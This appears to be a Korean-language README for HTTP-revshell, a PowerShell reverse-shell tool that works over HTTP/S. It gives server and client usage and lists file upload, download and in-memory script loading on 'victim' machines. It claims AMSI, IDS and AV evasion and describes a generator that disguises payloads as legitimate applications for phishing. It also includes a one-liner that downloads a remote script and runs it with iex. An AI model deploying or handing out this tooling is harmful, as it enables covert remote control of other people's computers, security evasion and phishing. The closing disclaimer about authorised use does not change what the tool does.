
PowerShell 리버스 셸, HTTP/S 프로토콜 사용, AMSI 우회 및 프록시 인식 기능 제공
HTTP-revshell은 레드팀 연습과 침투 테스터를 위한 도구입니다. 이 도구는 http/s 프로토콜을 통해 역방향 연결을 제공합니다. 웹 요청을 통해 피해자 머신을 제어하는 은밀 채널을 사용하여 IDS, IPS, AV와 같은 솔루션을 우회합니다.
참고: 이 도구는 우회 측면에서 유지 관리되지 않습니다. 약간의 수정만으로도 시중의 많은 EDR을 우회할 수 있습니다.

서버 사용법:
usage: server.py [-h] [--ssl] [--autocomplete] host port
positional arguments:
host Listen Host
port Listen Port
optional arguments:
-h, --help show this help message and exit
--ssl Send traffic over ssl
--autocomplete Autocomplete powershell functions
클라이언트 사용법:
Import-Module .\Invoke-WebRev.ps1
Invoke-WebRev -ip IP -port PORT [-ssl]
git clone https://github.com/3v4Si0N/HTTP-revshell.git
cd HTTP-revshell/
pip3 install -r requirements.txt
이 함수는 피해자 시스템에 파일을 업로드할 수 있게 해줍니다.
사용법:
upload /src/path/file C:\dest\path\file
이 함수는 공격자 시스템에 파일을 다운로드할 수 있게 해줍니다.
사용법:
download C:\src\path\file /dst/path/file
이 함수는 피해자의 디스크에 쓰지 않고 합법적인 HTTP 트래픽을 통해 파일을 읽어서 파워셸 스크립트를 로드할 수 있게 해줍니다.
사용법:
loadps1 /path/to/the/local/server/PowershellScript.ps1
이 스크립트는 HTTP-revshell을 사용하는 데 필요한 페이로드가 포함된 실행 파일을 생성할 수 있게 해줍니다. 화면의 지시에 따라 생성하면 됩니다. 6개의 사전 정의된 템플릿과 원하는 데이터로 커스터마이징 가능한 템플릿이 있습니다.
이 도구로 생성된 페이로드는 원본 애플리케이션의 합법적인 아이콘과 제품 및 저작권 정보를 포함합니다. 또한 각 페이로드는 서버와 연결을 설정하기 전에 원본 애플리케이션을 열어 합법적인 애플리케이션인 척합니다. 이는 피싱 또는 레드팀 연습에 사용될 수 있습니다.
페이로드 생성기 사용법:
powershell "iwr -useb https://raw.githubusercontent.com/3v4Si0N/HTTP-revshell/master/Revshell-Generator.ps1 | iex"

중요: 사전 정의된 템플릿의 모든 필드는 Enter 키를 누르면 자동 완성됩니다.
이 스크립트는 LGPLv3+에 따라 라이선스가 부여됩니다. 라이선스로 직접 이동.
HTTP-revshell은 승인된 침투 테스트 및/또는 비영리 교육 목적으로만 사용해야 합니다. 이 소프트웨어의 오용에 대한 책임은 저자나 다른 협력자에게 있지 않습니다. 자신의 서버 및/또는 서버 소유자의 허가를 받아 사용하십시오.